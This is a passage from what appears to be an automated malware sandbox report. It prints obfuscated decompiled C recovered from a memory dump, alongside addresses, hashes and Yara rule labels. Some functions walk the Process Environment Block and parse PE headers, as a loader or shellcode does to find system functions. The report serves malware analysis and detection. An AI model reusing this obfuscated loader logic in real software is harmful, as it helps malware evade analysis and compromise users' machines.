				signed int* _t173;

				_t114 = __edx;
				_v16 = 0;
				_push(_v16);
				 *_t173 =  *_t173 + __esi;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t173 =  *_t173 | __edi;
				_push(__esi);
				_t140 =  *_t173;
				 *_t173 =  *(__ebx + 0x41c166);
				_pop( *_t8);
				_v16 = __ebx;
				_t74 = _v16;
				_t163 = _a4 | _a4;
				_t127 = _t163;
				_t164 = _t161;
				if(_t163 != 0) {
					 *_t173 = __ecx;
					_t90 = _t127;
					_t128 = _t90 +  *((intOrPtr*)(_t127 + 0x3c));
					_t92 = 0;
					 *_t14 =  *((intOrPtr*)(_t128 + 0x34));
					_push(_v16);
					_pop(_t60);
					_v12 = _v12 - _t60;
					_t77 = _t74;
					_v16 = _t140;
					_v8 = _v8 & 0x00000000;
					_v8 = _v8 | _t140 & 0x00000000 ^ _t60;
					_t143 = _v16;
					 *_t173 =  *_t173 + _t92;
					_t93 = _t128;
					_t95 = 0;
					_t130 = _t93 + ( *(_t128 + 0x14) & 0x0000ffff) + 0xffffffc0;
					_t98 = _t95;
					 *_t173 = _t164;
					_t62 =  *_t130;
					_t167 = 0;
					 *_t173 =  *_t173 | _t62;
					_t63 = _t62;
					if( *_t173 != 0) {
						_t80 = _t77;
						 *_t27 = _t63;
						_v16 = _v16 + _v12;
						_push(_v16);
						_pop(_t64);
						_t145 = _t143;
						_push(_t98 & 0x00000000 ^ (_t77 -  *_t173 |  *(_t130 + 4)));
						 *_t32 = _t64;
						_v16 = _v16 + _v8;
						_push(_v16);
						_pop(_t65);
						_pop(_t102);
						_t133 = _t130;
						_v16 = _t65;
						_push(_v12 + (_t145 & 0x00000000 | _t130 & 0x00000000 ^ _v8));
						_t68 = _v16;
						_pop(_t148);
						while(1) {
							_t150 = _t102 | _t102;
							_t103 = _t150;
							_t151 = _t148;
							if(_t150 == 0) {
								goto L12;
							}
							_t117 = _t114;
							 *_t173 =  *_t173 ^ _t80;
							_push(_t133 & 0x00000000 | _t114 & 0x00000000 |  *_t68);
							_pop(_t81);
							_t133 = _t81 + _t151;
							_t83 = 0;
							_v16 = _v16 & 0x00000000;
							_push(_v16);
							 *_t173 =  *_t173 | _t103;
							_v16 = _t151;
							_t105 = _t103 & 0x00000000 | _t151 - _v16 ^  *(_t68 + 4);
							_t154 = _v16;
							_v16 = 0;
							_push(_v16);
							 *_t173 =  *_t173 + _t105;
							_t86 = _t83;
							_t107 = _t105 + 0xfffffff8 >> 1;
							_t68 = _t68 + 8;
							_t120 = _t117;
							while(1) {
								_t156 = _t107 | _t107;
								_t108 = _t156;
								_t154 = _t154;
								if(_t156 == 0) {
									break;
								}
								_v16 = 0;
								_push(_v16);
								 *_t173 =  *_t173 | _t108;
								 *_t173 = 0xf000;
								_t109 = _t133;
								_t111 = 0 ^  *_t173;
								_t173 =  &(_t173[1]);
								_t169 =  *_t68 & 0x0000ffff & _t109 |  *_t68 & 0x0000ffff & _t109;
								_t120 = _t169;
								_t170 = _t167;
								if(_t169 != 0) {
									_t120 =  *_t68 & 0xfff;
									_push(_v16);
									 *_t173 = _t68;
									_t154 = _t154;
									 *((intOrPtr*)(_t120 + _t133)) =  *((intOrPtr*)(_t120 + _t133)) + (_t68 & 0x00000000 | _t154 & 0x00000000 | _v12);
									_pop( *_t55);
									_t68 = _v16;
								}
								_t68 =  &_v2;
								_t167 = _t170;
								_t107 = _t111 - 1;
							}
							_t114 = _t120 & 0x00000000 ^  *_t173;
							_t173 =  &(_t173[1]);
							_pop( *_t57);
							_t102 = (_t108 & 0x00000000 ^ _v16) - _t114;
							_t80 = _t86;
						}
					} else {
					}
				} else {
				}
				L12:
				return _t68;
			}

0x00ea2faf
0x00ea2fb5
0x00ea2fbc
0x00ea2fbf
0x00ea2fc2
0x00ea2fc6
0x00ea2fc9
0x00ea2fcc
0x00ea2fd3
0x00ea2fd3
0x00ea2fd6
0x00ea2fd9
0x00ea2fe3
0x00ea2fe9
0x00ea2feb
0x00ea2fed
0x00ea2fee
0x00ea2ff7
0x00ea2ffb
0x00ea2fff
0x00ea3001
0x00ea3005
0x00ea3008
0x00ea300b
0x00ea3012
0x00ea3015
0x00ea3016
0x00ea301e
0x00ea3022
0x00ea3025
0x00ea302e
0x00ea3032
0x00ea3037
0x00ea3041
0x00ea3043
0x00ea3046
0x00ea304d
0x00ea304f
0x00ea3051
0x00ea3054
0x00ea3055
0x00ea3068
0x00ea306e
0x00ea3071
0x00ea3074
0x00ea3077
0x00ea3078
0x00ea3079
0x00ea307e
0x00ea3081
0x00ea3084
0x00ea3087
0x00ea3088
0x00ea3095
0x00ea3096
0x00ea309e
0x00ea309f
0x00ea30a2
0x00ea318d
0x00ea3190
0x00ea3192
0x00ea3194
0x00ea3195
0x00000000
0x00000000
0x00ea30b3
0x00ea30b6
0x00ea30b9
0x00ea30ba
0x00ea30bd
0x00ea30bf
0x00ea30c0
0x00ea30c4
0x00ea30c7
0x00ea30ca
0x00ea30d6
0x00ea30d8
0x00ea30db
0x00ea30e2
0x00ea30e5
0x00ea30f3
0x00ea30f4
0x00ea30ff
0x00ea3101
0x00ea3163
0x00ea3166
0x00ea3168
0x00ea316a
0x00ea316b
0x00000000
0x00000000
0x00ea3107
0x00ea310e
0x00ea3111
0x00ea3115
0x00ea311c
0x00ea3121
0x00ea3124
0x00ea312a
0x00ea312c
0x00ea312e
0x00ea312f
0x00ea3134
0x00ea313a
0x00ea313d
0x00ea314c
0x00ea314d
0x00ea3150
0x00ea3153
0x00ea3153
0x00ea315f
0x00ea3161
0x00ea3162
0x00ea3162
0x00ea3173
0x00ea3176
0x00ea317f
0x00ea318a
0x00ea318c
0x00ea318c
0x00000000
0x00ea3057
0x00000000
0x00ea2ff0
0x00ea319b
0x00ea31b0

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
Instruction ID: 89a565b844334692c8af3ad982789c39863261505f298b9f870485bede0af3e9
Opcode Fuzzy Hash: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
Instruction Fuzzy Hash: 83619633E04618AFEB048FD9DC857ADFBB5EF48724F1581BEE594A7280D7B429008B94

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2A69, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E00EA2A69(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t63;
				signed int _t70;
				signed int _t75;
				signed int _t88;
				signed int _t91;
				signed int _t105;
				signed int _t109;
				signed int _t112;
				signed int _t125;
				void* _t129;
				signed int* _t140;

				_push(_v16);
				 *_t140 = __eax;
				_push(__edi);
				 *_t140 =  *_t140 ^ __edi;
				 *_t140 =  *_t140 ^ __ecx;
				_push(_v12);
				 *_t140 = __edx;
				_push(__ecx);
				 *_t140 =  *_t140 ^ __ecx;
				 *_t140 =  *_t140 + __edi;
				_push(__ecx);
				 *_t140 =  *_t140 - __ecx;
				 *_t140 = __esi;
				if( *((intOrPtr*)(__ebx + 0x41ce4a)) != 1) {
					_v16 = __edx;
					_t103 = 0 ^  *(__ebx + 0x41c3f9);
					_push(__esi);
					_pop(_t125);
					_v16 = _t125;
					_t105 =  *(__ebx + 0x41c166) +  *((intOrPtr*)((__eax & 0x00000000 | __esi & 0x00000000 ^  *((0 ^  *(__ebx + 0x41c3f9)) + 0x3c)) + _t103 + 0x28));
					 *_t17 = _t105;
					_push(_v8);
					_pop(_t88);
					_t107 = _t105 & 0x00000000 | _t88 & 0x00000000 ^  *(__ebx + 0x41c166);
					_t91 = _t88;
					 *_t140 = __ecx;
					_t70 = 0;
					_push(0);
					 *_t140 =  *_t140 ^ _v16;
					_push( *((intOrPtr*)((0 ^  *((_t105 & 0x00000000 | _t88 & 0x00000000 ^  *(__ebx + 0x41c166)) + 0x3c)) + _t107 + 0x28)));
					_pop(_t129);
					_t109 = _t129 +  *(__ebx + 0x41c166);
					_v12 = _t70;
					_t52 = 0 ^ _t109;
					 *_t140 = _t109;
					_t112 = 0;
					_push(__ebx);
					_t75 = _v12 & 0x00000000 ^ __ebx & 0x00000000 ^  *( *((intOrPtr*)((0 ^  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t75;
					_pop(_t63);
					while(1) {
						_t112 = _t112 & 0x00000000 ^ _t91 ^  *_t140 ^  *(_t75 + 0x1c);
						_t91 = _t91;
						__eflags = _t52 - _t112;
						if(_t52 == _t112) {
							break;
						}
						__eflags = _t91 - _t112;
						if(__eflags != 0) {
							_t75 =  *(_t75 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t63 + 0x41ce4a)) = 1;
								_pop( *_t42);
								_pop( *_t44);
								_pop( *_t46);
								_t54 = _t52 & 0x00000000 ^ _t140[1];
								__eflags = _t54;
								return _t54;
							}
						} else {
							_pop( *_t36);
							_pop( *_t38);
							_t56 = _t52 & 0x00000000 |  *(_t140 - 0xfffffffc + 4);
							__eflags = _t56;
							return _t56;
						}
						goto L9;
					}
					_v8 = _t63;
					 *(_t75 + 0x1c) = _t91;
					_pop( *_t32);
					__eflags = 0 ^ _t140[2];
					_pop( *_t34);
					return _v8;
				} else {
					_pop( *_t4);
					_pop( *_t6);
					return  *((intOrPtr*)( &(_t140[1]) - 0xfffffffc));
				}
				L9:
			}

0x00ea2a6f
0x00ea2a72
0x00ea2a75
0x00ea2a76
0x00ea2a79
0x00ea2a7c
0x00ea2a7f
0x00ea2a82
0x00ea2a83
0x00ea2a86
0x00ea2a89
0x00ea2a8a
0x00ea2a8d
0x00ea2a97
0x00ea2ac9
0x00ea2ad4
0x00ea2ad9
0x00ea2ae5
0x00ea2aea
0x00ea2af9
0x00ea2afb
0x00ea2afe
0x00ea2b01
0x00ea2b0f
0x00ea2b11
0x00ea2b14
0x00ea2b1e
0x00ea2b23
0x00ea2b25
0x00ea2b28
0x00ea2b29
0x00ea2b30
0x00ea2b33
0x00ea2b3a
0x00ea2b41
0x00ea2b4f
0x00ea2b53
0x00ea2b5d
0x00ea2b5d
0x00ea2b5f
0x00ea2b60
0x00ea2b6a
0x00ea2b6c
0x00ea2b6d
0x00ea2b6f
0x00000000
0x00000000
0x00ea2bb4
0x00ea2bb6
0x00ea2bf2
0x00ea2bf5
0x00000000
0x00ea2bfb
0x00ea2bfb
0x00ea2c05
0x00ea2c11
0x00ea2c1d
0x00ea2c35
0x00ea2c35
0x00ea2c3c
0x00ea2c3c
0x00ea2bb8
0x00ea2bb8
0x00ea2bc4
0x00ea2be8
0x00ea2be8
0x00ea2bef
0x00ea2bef
0x00000000
0x00ea2bb6
0x00ea2b71
0x00ea2b78
0x00ea2b9c
0x00ea2ba4
0x00ea2baa
0x00ea2bb1
0x00ea2a99
0x00ea2a9f
0x00ea2aaf
0x00ea2ac6
0x00ea2ac6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction ID: ba132d182172135c09ab9c21f9df3468e1e16f472d3fea2769875aa35cd6b70c
Opcode Fuzzy Hash: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction Fuzzy Hash: 6851CE73D04500EFEB04DF69D98279EBBB1FF84320F1AC5ADC995A7284CA346A10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00EA150C, Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA150C(signed int __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _t88;
				signed int _t95;
				void* _t97;
				signed int _t100;
				signed int _t101;
				void* _t106;
				signed int _t107;
				signed int _t112;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				signed int _t124;
				signed int _t126;
				void* _t130;

				_t106 = __ebx;
				if(_t130 != _v12) {
					_t88 = __eax & 0x00000001;
					_t112 = _t112 & 0xffffffff;
				} else {
					_t88 = __eax ^ 0x1f4;
				}
				_a12 = _a12 - _t112;
				_a4 = _a4 & _t88;
				_a12 = 0xffffffff;
				_v12 = _v12 | _t107;
				_v12 = _v12 - 0xffffffff;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - 1;
				_v8 = _v8 - 1;
				_t115 = _t112 + 1 - 1 + 1;
				_v8 = _v8 | _t107 - 0x00000001;
				_t90 = _t88 - 0x51d + 0xffffffff;
				_a4 = _a4 ^ _t115;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) & _t126;
				_v12 = _v12 - _t88 - 0x51d + 0xffffffff;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - 1;
				_t95 = E00EA4A23(((_t90 | _a12) + 0x00000001 & 0x00000000) -  *(_t106 + 0x41d23c), _t106,  *((intOrPtr*)(_t106 + 0x41ce29)), ((_t90 | _a12) + 0x00000001 & 0x00000000) -  *(_t106 + 0x41d23c), _t126);
				_a4 = 0x458;
				 *(_t106 + 0x41d23c) = _t95;
				_a8 = _a8 ^ _t95;
				_t124 = _t115;
				 *(_t106 + 0x41d23c) = 0;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) ^ 0x00000001;
				 *(_t106 + 0x41d23c) = 0x13a;
				_a8 = _a8 - 0x31f;
				 *(_t106 + 0x41d23c) = _t126;
				_a8 = _a8 + 1;
				_t116 = _t115 - 1;
				_t97 = E00EA4A23(_t95 - 0x730, _t106, _t116,  *((intOrPtr*)(_t106 + 0x41c914)),  *((intOrPtr*)(_t106 + 0x41cea6)));
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) + _t97;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) ^ _t116;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - 1;
				_t100 = (_t97 + 0x00000001 ^ 0x00000000) + 0xffffffff;
				_v12 = _v12 & _t100;
				_t101 = _t100 ^ 0x00000000;
				_v12 = _t101;
				_v12 = _v12 + _t124;
				_v8 = _v8 - 1;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) + 1;
				_t118 = _t116 - _a8 - 0xffffffff;
				 *(_t106 + 0x41d23c) = _t118;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - (_t124 & 0x00000330);
				_v12 = _v12 & _t118;
				_a12 = _a12 | _t118;
				return (_t101 ^ 0x00000000) - 0x00000001 ^ 0x00000000;
			}

0x00ea150c
0x00ea151a
0x00ea1528
0x00ea152d
0x00ea151c
0x00ea1521
0x00ea1521
0x00ea1530
0x00ea1533
0x00ea1543
0x00ea154b
0x00ea1552
0x00ea1559
0x00ea1562
0x00ea1565
0x00ea156d
0x00ea1570
0x00ea1575
0x00ea1578
0x00ea157e
0x00ea1581
0x00ea15aa
0x00ea15af
0x00ea15b6
0x00ea15bc
0x00ea15c1
0x00ea15c3
0x00ea15c9
0x00ea15d3
0x00ea15dd
0x00ea15e9
0x00ea15f6
0x00ea15f9
0x00ea160c
0x00ea1611
0x00ea161c
0x00ea1627
0x00ea162d
0x00ea1639
0x00ea163c
0x00ea1644
0x00ea1647
0x00ea1652
0x00ea1655
0x00ea165c
0x00ea1668
0x00ea166e
0x00ea167f
0x00ea1682
0x00ea1690

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
Instruction ID: f1ba7edf2bf967b59c61042fb15958ee025ea41a9bddcaac796d715402c4e7fd
Opcode Fuzzy Hash: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
Instruction Fuzzy Hash: 93414CB2C11604ABEB04CF76CA857CA7BB0EF84330F24C3A9AC399A0D5C3348650AF55

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1967, Relevance: .1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA1967(signed int __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _t98;
				void* _t111;
				signed int _t116;
				void* _t117;
				signed int _t118;
				signed int _t119;
				void* _t121;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;

				_t117 = __ebx;
				_t98 = __eax;
				if(__ebx >= _a4) {
					_a4 = _a4 & _t128;
					_a4 = _a4 + 0xffffffff;
				} else {
					_t128 = (_t128 + 0xffffffff & 0x000006b0) + 1;
				}
				 *(_t117 + 0x41c345) =  *(_t117 + 0x41c345) ^ 0x000003e3;
				_t129 = _t128 & 0x00000000;
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) ^ _t98;
				if( *(_t117 + 0x41c345) < 0x34d9) {
					_a4 = _a4 & 0xffffffff;
					_t98 = _t98 + 1;
				} else {
					 *(_t117 + 0x41c345) =  *(_t117 + 0x41c345) ^ _t129;
					 *(_t117 + 0x41c345) = 0x295;
					_v8 = _v8 + 1;
				}
				_t119 = _t118 &  *(_t117 + 0x41c345);
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) | _t129;
				_a4 = _a4 + _t129;
				_v8 = 0xffffffff;
				_t130 = _t129 + _v8;
				_a4 = _a4 | 0xfffff88b;
				_v8 = _v8 - 1;
				_v8 = _v8 + 1;
				_v8 = _v8 + 1;
				_v8 = _v8 | _t130;
				 *(_t117 + 0x41c598) = _t121 - _t119;
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) & 0xffffffff;
				_v8 = _t119;
				_a4 = _a4 ^ 0x0000033f;
				_a4 = _a4 ^ _t119;
				_a4 = _a4 & _t126;
				_a4 = 0xfffffbb6;
				_v8 = _v8 | _t119;
				_v8 = _v8 - 1;
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) | _t126;
				_a4 = _a4 + 0xffffffff;
				_a4 = _a4 - 1;
				_a4 = _a4 - 1;
				_a4 = _a4 ^ 0x00000001;
				_a4 = _a4 & _t130;
				_t111 = E00EA1693((((_t98 - 0x00000001 + 0xffffffff - 0x0000031a ^ 0x2b0) + 0x00000409 ^ 0 | 0xffffffff) + 0xfffff86b ^ 0x00000000) + 1, _t117,  *((intOrPtr*)(_t117 + 0x41c6d0)),  *((intOrPtr*)(_t117 + 0x41c3f5)));
				 *(_t117 + 0x41c598) = 0x6a4;
				_t116 = (_t111 - 0x00000001 + 0x0000030f ^ 0xfffffffffffffffe) & 0x00000001;
				_a4 = _t116;
				_a4 = _a4 - 1;
				_v8 = _v8 - 0xffffffff;
				return _t116;
			}

0x00ea1967
0x00ea1967
0x00ea1975
0x00ea1985
0x00ea1988
0x00ea1977
0x00ea1980
0x00ea1980
0x00ea198c
0x00ea1996
0x00ea1999
0x00ea19a9
0x00ea19c0
0x00ea19c4
0x00ea19ab
0x00ea19ab
0x00ea19b1
0x00ea19bb
0x00ea19bb
0x00ea19c5
0x00ea19cb
0x00ea19d1
0x00ea19d9
0x00ea19e0
0x00ea19f4
0x00ea19fb
0x00ea19fe
0x00ea1a03
0x00ea1a07
0x00ea1a0a
0x00ea1a16
0x00ea1a1d
0x00ea1a25
0x00ea1a3c
0x00ea1a4e
0x00ea1a54
0x00ea1a60
0x00ea1a6d
0x00ea1a70
0x00ea1a76
0x00ea1a7a
0x00ea1a84
0x00ea1a87
0x00ea1a8b
0x00ea1a9a
0x00ea1abc
0x00ea1af5
0x00ea1afa
0x00ea1b02
0x00ea1b05
0x00ea1b1b

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
Instruction ID: a30ffe0b82c8a194f6386e08cf7e97ff343980b233d4d2bc08f4aa7f87700c8c
Opcode Fuzzy Hash: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
Instruction Fuzzy Hash: 9E416D72C10618EBEB04CF68C9CA7CA3A70EF45370F288399AC789D1D6C3395651DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00EA510C, Relevance: .1, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA510C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				void* _t172;

				_t172 = __ebx;
				 *((intOrPtr*)(__esi - 0x7d)) =  *((intOrPtr*)(__esi - 0x7d)) + __ebx;
				 *0x80 =  *0x80 + __ecx + 1;
			}

0x00ea510c
0x00ea510f
0x00ea5117

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331e0fd28ad3b28dfd5da4a79875bb9b5a58f2601806572cfc4b17282ee6567e
Instruction ID: 756d3aeab34b3ef7b4e04a9cc4b27363b2aee0fd978717632ca88830ccfd6173
Opcode Fuzzy Hash: 331e0fd28ad3b28dfd5da4a79875bb9b5a58f2601806572cfc4b17282ee6567e
Instruction Fuzzy Hash: 55415E72844215CFEF00DFA4C8857EEBBF1FF08321F06056ED895AA145D7785924CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00EA88BA, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA88BA(void* __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				void* _t56;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				void* _t77;
				void* _t83;
				signed int _t84;
				void* _t89;
				void* _t96;
				signed int _t100;
				void* _t102;

				_t77 = __ebx;
				_t56 = __eax;
				if(_a4 > 0x9b86) {
					_t83 = _t83 - 1;
					_t89 = _t89 + 0xffffffff;
				}
				_t57 = _t56 + 0xffffffff;
				_t78 = 0xffffffff;
				if(_t83 > _a8) {
					 *(_t77 + 0x41c619) =  *(_t77 + 0x41c619) & 0xffffffff;
				} else {
					_t78 = 0;
					_t57 = _t57 ^ 0x00000000;
				}
				_t58 = _t57 & 0x00000001;
				_a12 = 1;
				_t84 = _t83 + 1;
				 *(_t77 + 0x41c619) =  *(_t77 + 0x41c619) | _t58;
				_t59 = _t58 ^ _t96 + 0xfffffa6c;
				if(_t102 < _t89) {
					 *(_t77 + 0x41c619) = 1;
					_t78 = _v12;
				} else {
					_a8 = _a8 + _t78;
					_t59 = _t59 ^ 0xffffffff;
				}
				_v12 = _v12 + 1;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 + 0xffffffff;
				_a12 = _a12 + 0xffffff46;
				_v8 = _v8 - 1;
				_v8 = _v8 + 0xfffffad4;
				_a4 = _a4 | _t84;
				_a12 = _a12 + 1;
				_t100 = _a12;
				_v8 = _v8 ^ _t100;
				_v12 = 0xfffffcfa;
				_v12 = _v12 ^ 0xffffffff;
				_a4 = _t100;
				_v8 = _v8 - 0xfffffe99;
				_v12 = _v12 & _t78;
				_a8 = _a8 + 1;
				_a8 = _a8 | 0x00000001;
				return 1;
			}

0x00ea88ba
0x00ea88ba
0x00ea88cc
0x00ea88ce
0x00ea88cf
0x00ea88cf
0x00ea88de
0x00ea88e3
0x00ea88eb
0x00ea88f5
0x00ea88ed
0x00ea88ed
0x00ea88ee
0x00ea88ee
0x00ea88fb
0x00ea8904
0x00ea890b
0x00ea890c
0x00ea8912
0x00ea8916
0x00ea8923
0x00ea892d
0x00ea8918
0x00ea8918
0x00ea891b
0x00ea891b
0x00ea8930
0x00ea8933
0x00ea8941
0x00ea8948
0x00ea8954
0x00ea895c
0x00ea8968
0x00ea8978
0x00ea897b
0x00ea8984
0x00ea898f
0x00ea899a
0x00ea89aa
0x00ea89c0
0x00ea89c5
0x00ea89d0
0x00ea89da
0x00ea89f3

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
Instruction ID: afa7efd0739692f630c937da57fc31ec58b77cd3f4a256dfcd9842b9914f3d88
Opcode Fuzzy Hash: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
Instruction Fuzzy Hash: C9317C72920A049BEB08CE78CD853DE7761FF85339F24C35AEC359A1D1DB789A518B48

Uniqueness

Uniqueness Score: -1.00%

Function 00EA27D4, Relevance: .1, Instructions: 93
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA27D4(signed int __eax, void* __ebx, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _t62;
				signed int _t64;
				signed int _t65;
				signed int _t76;
				void* _t78;
				signed int _t79;
				void* _t84;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t95;

				_t78 = __ebx;
				_t60 = __eax;
				if(_v8 >= 0x74b6) {
					_t60 = (__eax ^ _a4) + 1;
				} else {
					_t79 = _t79 + _t90;
				}
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) - _t79;
				_t62 = E00EA92B2(_t60, _t78,  *((intOrPtr*)(_t78 + 0x41c5d8)),  *((intOrPtr*)(_t78 + 0x41d186)));
				_v8 = _v8 + 1;
				_t64 = _t62 + 1 - 0xffffffff;
				if(_a4 < 0xae5c) {
					_t95 =  *(_t78 + 0x41c908);
				} else {
					_t90 = _t90 ^ 0x00000000;
					_t64 = _t64 & 0x00000000;
				}
				_v8 = _v8 & 0xffffffff;
				_t91 = _t90 - 1;
				_t65 = _t64 + 0xfffffea2;
				_a4 = _a4 ^ _t91;
				_a8 = 1;
				if(_t79 <= _v8) {
					_t65 = _t65 - 1;
					_v8 = _v8 ^ 0x0000029c;
					_t79 = _t79 | _a8;
				} else {
					_v8 = _v8 - 1;
					_t95 = _t95 & _a4;
					_a4 = _a4 + 1;
				}
				_t92 = _t91 & 0xfffff9dc;
				_a4 = _a4 + _t92;
				_a4 = _a4 - 1;
				_v8 = _v8 & 0x00000000;
				_a8 = _a8 - 1;
				_a8 = _a8 & 0x00000001;
				_t76 = ((((_t65 ^ 0xfffff825) + 0x00000001 & 0) - 0x00000001 & 0xfffffaf6 ^ 0x00000000) & 0) + 0x566;
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) | _t84 -  *(_t78 + 0x41c908) + 0xffffffff;
				_v8 = _v8 ^ 0x00000001;
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) - 1;
				_a8 = _a8 - 1;
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) & (_t95 - 0x00000001 ^ 0x00000000 ^ _t92 ^ 0x00000005 ^ _t76);
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) - _t92 + 1 - 0x7fa;
				return _t76 & 0x000005b0;
			}

0x00ea27d4
0x00ea27d4
0x00ea27e6
0x00ea27f3
0x00ea27e8
0x00ea27e8
0x00ea27e8
0x00ea27f8
0x00ea280a
0x00ea2814
0x00ea2818
0x00ea2824
0x00ea2839
0x00ea2826
0x00ea2826
0x00ea2829
0x00ea2829
0x00ea283f
0x00ea2843
0x00ea2844
0x00ea2849
0x00ea284c
0x00ea2856
0x00ea2863
0x00ea2868
0x00ea286f
0x00ea2858
0x00ea2858
0x00ea285b
0x00ea285e
0x00ea285e
0x00ea287d
0x00ea28a0
0x00ea28a3
0x00ea28a6
0x00ea28ad
0x00ea28bf
0x00ea28e3
0x00ea28ed
0x00ea28fd
0x00ea290a
0x00ea2911
0x00ea2917
0x00ea291d
0x00ea2929

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
Instruction ID: c2e8b6308f5aa8eb8db69a4b93faddb4186bd3e4aab15f5536954bd75a64e0b0
Opcode Fuzzy Hash: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
Instruction Fuzzy Hash: 72316473920604AFEB04CF38CD863DA7774EF50335F29C369AC299E0D5D379A6909A54

Uniqueness

Uniqueness Score: -1.00%

Function 00EA13C5, Relevance: .1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA13C5(signed int __eax, void* __ebx, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _t69;
				void* _t71;
				signed int _t89;
				void* _t93;
				signed int _t94;
				intOrPtr _t98;
				signed int _t103;
				signed int _t108;
				signed int _t109;
				signed int _t111;

				_t93 = __ebx;
				_t69 = __eax;
				if(__eax == 0xa709) {
					_t94 = _t94 | 0xffffffff;
				} else {
					 *(__ebx + 0x41ca6d) =  *(__ebx + 0x41ca6d) & _t108;
				}
				_t109 = _t108 +  *((intOrPtr*)(_t93 + 0x41c507));
				_a8 = _a8 - _t109;
				_v12 = _v12 & _t109;
				_v12 = _v12 - 1;
				_t71 = E00EA9159(_t69 & 0x00000001, _t93,  *((intOrPtr*)(_t93 + 0x41d0c3)));
				 *((intOrPtr*)(_t93 + 0x41ca6d)) = 0x417;
